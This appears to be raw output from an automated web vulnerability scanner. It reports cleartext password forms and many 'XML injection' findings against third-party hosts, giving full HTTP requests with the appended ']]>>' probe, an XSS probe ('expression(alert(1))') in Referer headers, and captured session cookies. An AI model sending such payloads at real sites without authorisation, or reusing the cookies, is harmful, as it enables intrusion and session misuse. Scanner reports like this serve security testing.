<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html lang="en-us"> <head> <title>Dallas Local Events | Find co ...[SNIP]... </p>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html lang="en-us"> <head> <title>Dallas Theatre and Comedy Eve ...[SNIP]... </p>
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://www.local.com/results.aspx
The form contains the following password field:
password
Request
GET /results.aspx HTTP/1.1 Host: www.local.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html lang="en-us"> <head> <title>Dallas, TX - Search for Local ...[SNIP]... </p>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html lang="en-us"> <head> <title>Chicago, IL Local Business Se ...[SNIP]... </p>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html lang="en-us"> <head> <title>Los Angeles, CA Local Busines ...[SNIP]... </p>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html lang="en-us"> <head> <title>New York, NY Local Business S ...[SNIP]... </p>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html lang="en-us"> <head> <title>Cooking, Nutrition and Food A ...[SNIP]... </p>
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://www.sipc.org/claim/module/login.cfm
The form contains the following password field:
password
Request
GET / HTTP/1.1 Host: www.sipc.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Thu, 03 Feb 2011 13:18:03 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://www.sipc.org/claim/module/login.cfm
The form contains the following password field:
password
Request
GET /index.cfm HTTP/1.1 Host: www.sipc.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Thu, 03 Feb 2011 13:50:35 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
XML or SOAP injection vulnerabilities arise when user input is inserted into a server-side XML document or SOAP message in an unsafe way. It may be possible to use XML metacharacters to modify the structure of the resulting XML. Depending on the function in which the XML is used, it may be possible to interfere with the application's logic, to perform unauthorised actions or access sensitive data.
This kind of vulnerability can be difficult to detect and exploit remotely; you should review the application's response, and the purpose the relevant input serves within the application's functionality, to determine whether it is indeed vulnerable.
Issue remediation
The application should validate or sanitise user input before incorporating it into an XML document or SOAP message. It may be possible to block any input containing XML metacharacters such as < and >. Alternatively, these characters can be replaced with the corresponding entities: &lt; and &gt;.
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /adscgen]]>>/log_ut_err.php HTTP/1.1 Host: a.dlqm.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 16:08:39 GMT Server: Apache/2.2.3 Vary: accept-language Accept-Ranges: bytes Keep-Alive: timeout=5, max=920 Connection: Keep-Alive Content-Type: text/html Content-Language: en Content-Length: 1052
<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang=" ...[SNIP]...
The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /adscgen/log_ut_err.php]]>> HTTP/1.1 Host: a.dlqm.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 16:08:41 GMT Server: Apache/2.2.3 Vary: accept-language Accept-Ranges: bytes Keep-Alive: timeout=5, max=416 Connection: Keep-Alive Content-Type: text/html Content-Language: en Content-Length: 1052
<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang=" ...[SNIP]...
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /adscgen]]>>/st.php?survey_num=865756&site=57865895&code=39213494&randnum=1239703 HTTP/1.1 Host: amch.questionmarket.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CS1=823529-1-2_39959898-17-1_40016019-8-1_40015506-8-3_849331-6-5_825697-8-1_39942282-8-1_39823749-21-1_40142779-4-1_38973908-10-1_865756-1-4; ES=823529-ie.pM-MG_844890-`:tqM-0_822109-|RIsM-26_853829-y]GsM-Bi1_847435-l^GsM-!"1_791689-/qcsM-0_852149-*jtsM-0_775684-'LysM-0_865756-tvKtM-i
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 16:07:30 GMT Server: Apache/2.2.3 Vary: accept-language Accept-Ranges: bytes Content-Type: text/html Content-Language: en Content-Length: 1065
<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang=" ...[SNIP]...
The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /adscgen/st.php]]>>?survey_num=865756&site=57865895&code=39213494&randnum=1239703 HTTP/1.1 Host: amch.questionmarket.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CS1=823529-1-2_39959898-17-1_40016019-8-1_40015506-8-3_849331-6-5_825697-8-1_39942282-8-1_39823749-21-1_40142779-4-1_38973908-10-1_865756-1-4; ES=823529-ie.pM-MG_844890-`:tqM-0_822109-|RIsM-26_853829-y]GsM-Bi1_847435-l^GsM-!"1_791689-/qcsM-0_852149-*jtsM-0_775684-'LysM-0_865756-tvKtM-i
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 16:07:33 GMT Server: Apache/2.2.3 Vary: accept-language Accept-Ranges: bytes Content-Type: text/html Content-Language: en Content-Length: 1065
<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang=" ...[SNIP]...
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /pages]]>>/scripts/0011/2796.js HTTP/1.1 Host: dnn506yrbagrg.cloudfront.net Proxy-Connection: keep-alive Referer: http://www.thehealthreport.net/ac-usap.php?sub=xyp Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /pages/scripts]]>>/0011/2796.js HTTP/1.1 Host: dnn506yrbagrg.cloudfront.net Proxy-Connection: keep-alive Referer: http://www.thehealthreport.net/ac-usap.php?sub=xyp Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /pages/scripts/0011]]>>/2796.js HTTP/1.1 Host: dnn506yrbagrg.cloudfront.net Proxy-Connection: keep-alive Referer: http://www.thehealthreport.net/ac-usap.php?sub=xyp Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /pages/scripts/0011/2796.js]]>> HTTP/1.1 Host: dnn506yrbagrg.cloudfront.net Proxy-Connection: keep-alive Referer: http://www.thehealthreport.net/ac-usap.php?sub=xyp Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /load]]>>/?p=235&g=001&ctg=Retail+Banks&cat=financial_services&state=TX&city=Dallas&kw=banks HTTP/1.1 Host: loadus.exelator.com Proxy-Connection: keep-alive Referer: http://www.local.com/results.aspx?keyword=banks&cid=506c80ba%22style%3d%22x%3aexpression(alert(1))%2245503434253&client=ca-dp-r-mark03_3ph_js Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: EVX=eJxLtDKyqs60MrIwNTa3tE60MgTxDKyLrQwtrJQMTSxM483jjUxM4w0MDOOBUMm6NtPK2MDI3NyUKMW1ALLGGNA%253D; xltl=eJxLtDKyqi62MrZSCvV0UbIGsoyslEwSE02STSwtzRPNU03MkiwsktMMUpItzCzSkgwtTFMNwOqslHyCnJWsM60MTSwsDQ0Mza1rASUAFEE%253D; myPAL=eJx90D0TwiAMgOH%252F0qwMSQoE6FR18c46aPW6Ojo7qv%252Fd0Ert0HPj4OHl45Ziet4TNo%252FEkiqyPkKMkYDQAnqEXgedznDV3BNl5jMT92WCgEjKBIviOTartVitzI6x4ICDqyWaGll0E1s3VttNb%252FbHqzl1g9keOtPuhrzTzgcE%252BXOA%252B7GwYGFifWFeGYUlY0SwwUNeldUI4RS5lEjIbIqUD5Ra38BwZrR67xdS1bw%252F4wdQXA%253D%253D; BFF=eJytksFugzAQRP%252BFL7C9kMXmkjQ9BClQKThRe6o45pxjmn%252FPQoGs0fpAxHVmdtbWvtYZcPeb08olXqu02lprTVJcnU5zLMgAl1RftT8cf34vZVP6pGgdRGc2lmayQWdSkAVm2E5HxSowIzn9l5nSNew%252B%252FNbkGaAdXtgZ0OtMGJOgDGI2M8r6IlaQLiTFilP1LVaQLiQ1%252FReNYIjd%252B2MldpMuJMWK3afQDb3Ok2Y8SLAOAyuoQXZGzzHJXyf3TBprZicLrWBDzjacIxvOsSxwg8KNUSl9%252BU%252Fpzt0M7sjiy%252BWGmYz5DE7OJD5kqntYI1RHGV6O7HJCVwRyOX8r47YyW%252B%252BCFOPl8QSq6EMG; TFF=eJydlEuOgzAMQO%252FSE9hOgu2w4RizZcFipO5mdlXvPobSUMXpKHSBEkXvxR8McybJt5%252BMlC8IcYIBJlWlyzhnyrfvjKM9UdgW2LaDjnfH48qHiid7YuVx0foMWyFWpOzk4O9evpbr%252FLvUd%252BtuELbKYJgAsFU2p8Lb1vN12Ru%252FBsLK46L1GbYydN695kQxvatBjhrkwceDJ0mBtW6Xj%252BRNVA1Mn5gBiDn1mlzEPsPOYurN6jnE0h56OXhp8C4j8XHkdejFDf07Y3unAFOU4f9I5EPtXqdihwC9tz8bgHCuYTt%252FtmGmnWkYcrA5oWZmevDa4F1m6uOU%252F9dD6zPWDzl0kfc%252F%252B2Zmpg%253D%253D
Response
HTTP/1.1 404 Not Found Connection: close Content-Type: text/html Content-Length: 345 Date: Thu, 03 Feb 2011 16:16:20 GMT Server: HTTP server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /load]]>>/net.php?n=PGltZyBzcmM9Imh0dHA6Ly9hZHMuYWRicml0ZS5jb20vYWRzZXJ2ZXIvYmVoYXZpb3JhbC1kYXRhLzgyMDE%2FZD0xMTI2LDIiIHdpZHRoPSIwIiBoZWlnaHQ9IjAiIGJvcmRlcj0iMCI%2BPC9pbWc%2BPGltZyBzcmM9Imh0dHA6Ly9hLmNvbGxlY3RpdmUtbWVkaWEubmV0L2RhdGFwYWlyP25ldD1leCZzZWdzPTI1Jm9wPWFkZCIgd2lkdGg9IjEiIGhlaWdodD0iMSI%2BPC9pbWc%2B&h=149c9c261f7ed36bad90adb9004f3768 HTTP/1.1 Host: loadus.exelator.com Proxy-Connection: keep-alive Referer: http://www.local.com/results.aspx?keyword=banks&cid=506c80ba%22style%3d%22x%3aexpression(alert(1))%2245503434253&client=ca-dp-r-mark03_3ph_js Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: xltl=eJxLtDKyqi62MrZSCvV0UbIGsoyslEwSE02STSwtzRPNU03MkiwsktMMUpItzCzSkgwtTFMNwOqslHyCnJWsM60MTSxNDcxMLa1rASUaFEk%253D; myPAL=eJx9kLtuwzAMRf%252FFXDmQ1IOSPLk1CgSIDaR1i6wdM3ds%252B%252B%252BlrNrJEGTS6%252FBQvJ%252BFqXxfCvVfRbR07GOGnDMDkweKBIttJruRrr8UrlismIZ%252FTAmI2DCljZJdtlP3ZM4wv8pSAEnBaUZHolYkPqzW4WnBw%252FyBr9MZn48TDuO5Vvq9QdIHDcIVSzdYatiyYdEwTreYEIFPEeqr3pUwNcn7JkkVa5ItQHU2g8CbkLd%252F%252FxBXLhsXV11es%252FGYRSkwCgmFenAc22IxuBbDONjs42lecDzML1hTsTS6%252FvcPkKZiCA%253D%253D; BFF=eJytk81ugzAQhN%252BFJ%252FBvFptLaKOqSEDVxonSU5Vjzjm2ffeuCSRrtD5Qcf1mPAZ55uyV899XL4UvghSm2zrnVFFdvDQlVChoX3RvfXhtP7%252BOzb4JRXX2RuXObByesSMnKPFqIrjIQZAIsIjNDRMSE%252BqnsFWl1eDGL4yCHjgBk1MLBWBnQtMf2QjkjJON%252BOhObARyxinxf0ExApv93HZsNnLGyUbUOyZbD5w61fQgyXWQSEkMkGcMtCbl48kDQVPM7MlSKbmhJDccMjcccl5NBTTvlTD4yz9CRnUzqlMXHyoV1F2Yn4G7QiB2d1e3Q6XNDbuxuxETEo3vfeCMiGfGpn%252FhjIgJmTruFAgr04RhJUIJm%252BKhWgn%252B5XcJNr%252FL7AqXj275xlac1PIFrTyYldfx3ynkG58pd6bKmeKuU9M%252FggaTAQ%253D%253D; 
Response
HTTP/1.1 404 Not Found Connection: close Content-Type: text/html Content-Length: 345 Date: Thu, 03 Feb 2011 16:15:36 GMT Server: HTTP server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /load/net.php]]>>?n=PGltZyBzcmM9Imh0dHA6Ly9hZHMuYWRicml0ZS5jb20vYWRzZXJ2ZXIvYmVoYXZpb3JhbC1kYXRhLzgyMDE%2FZD0xMTI2LDIiIHdpZHRoPSIwIiBoZWlnaHQ9IjAiIGJvcmRlcj0iMCI%2BPC9pbWc%2BPGltZyBzcmM9Imh0dHA6Ly9hLmNvbGxlY3RpdmUtbWVkaWEubmV0L2RhdGFwYWlyP25ldD1leCZzZWdzPTI1Jm9wPWFkZCIgd2lkdGg9IjEiIGhlaWdodD0iMSI%2BPC9pbWc%2B&h=149c9c261f7ed36bad90adb9004f3768 HTTP/1.1 Host: loadus.exelator.com Proxy-Connection: keep-alive Referer: http://www.local.com/results.aspx?keyword=banks&cid=506c80ba%22style%3d%22x%3aexpression(alert(1))%2245503434253&client=ca-dp-r-mark03_3ph_js Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: xltl=eJxLtDKyqi62MrZSCvV0UbIGsoyslEwSE02STSwtzRPNU03MkiwsktMMUpItzCzSkgwtTFMNwOqslHyCnJWsM60MTSxNDcxMLa1rASUaFEk%253D; myPAL=eJx9kLtuwzAMRf%252FFXDmQ1IOSPLk1CgSIDaR1i6wdM3ds%252B%252B%252BlrNrJEGTS6%252FBQvJ%252BFqXxfCvVfRbR07GOGnDMDkweKBIttJruRrr8UrlismIZ%252FTAmI2DCljZJdtlP3ZM4wv8pSAEnBaUZHolYkPqzW4WnBw%252FyBr9MZn48TDuO5Vvq9QdIHDcIVSzdYatiyYdEwTreYEIFPEeqr3pUwNcn7JkkVa5ItQHU2g8CbkLd%252F%252FxBXLhsXV11es%252FGYRSkwCgmFenAc22IxuBbDONjs42lecDzML1hTsTS6%252FvcPkKZiCA%253D%253D; BFF=eJytk81ugzAQhN%252BFJ%252FBvFptLaKOqSEDVxonSU5Vjzjm2ffeuCSRrtD5Qcf1mPAZ55uyV899XL4UvghSm2zrnVFFdvDQlVChoX3RvfXhtP7%252BOzb4JRXX2RuXObByesSMnKPFqIrjIQZAIsIjNDRMSE%252BqnsFWl1eDGL4yCHjgBk1MLBWBnQtMf2QjkjJON%252BOhObARyxinxf0ExApv93HZsNnLGyUbUOyZbD5w61fQgyXWQSEkMkGcMtCbl48kDQVPM7MlSKbmhJDccMjcccl5NBTTvlTD4yz9CRnUzqlMXHyoV1F2Yn4G7QiB2d1e3Q6XNDbuxuxETEo3vfeCMiGfGpn%252FhjIgJmTruFAgr04RhJUIJm%252BKhWgn%252B5XcJNr%252FL7AqXj275xlac1PIFrTyYldfx3ynkG58pd6bKmeKuU9M%252FggaTAQ%253D%253D; 
Response
HTTP/1.1 404 Not Found Connection: close Content-Type: text/html Content-Length: 345 Date: Thu, 03 Feb 2011 16:15:37 GMT Server: HTTP server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /yt/cssbin]]>>/www-embed-vflPrzZNL.css HTTP/1.1 Host: s.ytimg.com Proxy-Connection: keep-alive Referer: http://www.youtube.com/embed/aP2pdXfgWzM?rel=0 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Cache-Control: public, max-age=31104000 Expires: Sun, 26 Dec 2032 06:12:01 GMT Content-Type: text/html Content-Length: 345 Date: Thu, 03 Feb 2011 16:24:18 GMT Server: lighttpd-yt/1.4.18
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /yt/cssbin/www-embed-vflPrzZNL.css]]>> HTTP/1.1 Host: s.ytimg.com Proxy-Connection: keep-alive Referer: http://www.youtube.com/embed/aP2pdXfgWzM?rel=0 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Thu, 03 Feb 2011 16:24:18 GMT Server: lighttpd-yt/1.4.18
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /yt/jsbin]]>>/www-embed-vfl4nNnFQ.js HTTP/1.1 Host: s.ytimg.com Proxy-Connection: keep-alive Referer: http://www.youtube.com/embed/aP2pdXfgWzM?rel=0 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Cache-Control: public, max-age=31104000 Expires: Sun, 26 Dec 2032 06:12:01 GMT Content-Type: text/html Content-Length: 345 Date: Thu, 03 Feb 2011 16:24:20 GMT Server: lighttpd-yt/1.4.18
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /yt/jsbin/www-embed-vfl4nNnFQ.js]]>> HTTP/1.1 Host: s.ytimg.com Proxy-Connection: keep-alive Referer: http://www.youtube.com/embed/aP2pdXfgWzM?rel=0 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Thu, 03 Feb 2011 16:24:21 GMT Server: lighttpd-yt/1.4.18
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /tools]]>>/hcc.asp?callback=jsonp1296748868891&widgetId=2130113621124&widgetType=flash&hostUrl=http%3A%2F%2Fgsbmtg1-px.rtrk.com%2Fhome.html HTTP/1.1 Host: urlwww--feedzilla--com.rtrk.com Proxy-Connection: keep-alive Referer: http://gsbmtg1-px.rtrk.com/home.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: RlocalUID=scid%3D1794971%26cid%3D696829%26tc%3D11020308002595319%26clk%3D1296748826%26dynamic_proxy%3D1%26primary_serv%3Dgsbmtg1-px.rtrk.com; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0; RlocalTiming=retarget%3D0%26retarget_off%3D0%26track_landing_pages%3D1%26landing_loadtime_off%3D1; NSC_wt-vtb-susl-iuuq2=ffffffff096e1b7b45525d5f4f58455e445a4a423660
Response
